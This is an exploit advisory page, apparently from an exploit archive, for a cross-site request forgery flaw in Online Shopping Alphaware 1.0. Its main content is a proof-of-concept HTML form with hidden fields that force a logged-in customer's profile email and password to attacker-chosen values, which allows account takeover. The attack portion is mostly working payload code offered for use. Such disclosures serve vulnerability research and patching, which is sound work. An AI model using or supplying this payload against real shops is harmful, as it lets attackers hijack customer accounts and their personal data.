Online Shopping Alphaware 1.0 Cross Site Request Forgery

Online Shopping Alphaware version 1.0 suffers from a cross site request forgery vulnerability.

MD5 | 0e473b277cc5006c19c5c1b0cd4d436f

# Exploit Title: Online Shopping Alphaware 1.0  - Cross-Site Request Forgery (Account Takeover)
# Date: 2020-8-4
# Exploit Author: Edo Maland
# Vendor Homepage:
# Software Link:
# Version: 1.0
# Tested On Windows & Linux Server

# Vulnerability Details
# Description : Account Take over and Edit Profil Customer


The email and password parameters can be forged to force the password change of another user account.


<script>history.pushState('', '', '/')</script>
<form action="" method="POST">
<input type="hidden" name="firstname" value="info" />
<input type="hidden" name="mi" value="x" />
<input type="hidden" name="lastname" value="csrf" />
<input type="hidden" name="address" value="Yogyakarta" />
<input type="hidden" name="country" value="Indonesia" />
<input type="hidden" name="zipcode" value="1337" />
<input type="hidden" name="mobile" value="1337" />
<input type="hidden" name="telephone" value="1337" />
<input type="hidden" name="email" value="[email protected]" />
<input type="hidden" name="password" value="changepasswordhere" />
<input type="hidden" name="edit" value="Save Changes" />
<input type="submit" value="Submit request" />

Related Posts